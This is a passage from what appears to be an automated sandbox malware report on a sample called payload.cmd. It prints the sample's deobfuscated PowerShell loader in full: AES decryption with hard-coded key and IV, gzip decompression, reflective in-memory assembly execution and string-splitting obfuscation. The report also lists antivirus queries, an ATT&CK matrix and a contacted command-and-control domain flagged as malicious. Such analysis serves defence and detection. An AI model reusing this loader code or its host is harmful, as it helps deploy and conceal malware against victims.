''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\payload.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

41_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

41_2_0000000140002300

Source: dwm.exe, 0000002D.00000000.2092393360.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002D.00000002.2639184711.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerd
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\cmd.exe

Code function: 20_3_000002527DEC2AF0 cpuid

20_3_000002527DEC2AF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-9pdB1aHK VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-9pdB1aHK VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

41_2_0000000140002300

Source: C:\Windows\System32\cmd.exe

Code function: 20_2_000002527DEE8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

20_2_000002527DEE8090

Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.53.dr

Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	141 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Obfuscated Files or Information	11 Input Capture	2 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	22 Command and Scripting Interpreter	11 Scheduled Task/Job	813 Process Injection	1 Software Packing	Security Account Manager	143 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	31 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	1 DLL Side-Loading	NTDS	481 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	31 Registry Run Keys / Startup Folder	1 File Deletion	LSA Secrets	2 Process Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Rootkit	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	261 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	813 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	2 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
payload.cmd	0%	ReversingLabs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
ipwho.is	195.201.57.90	true	false	unknown
azure-winsecure.com	154.216.20.132	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipwho.is/	false		unknown

URLs from Memory and Binaries

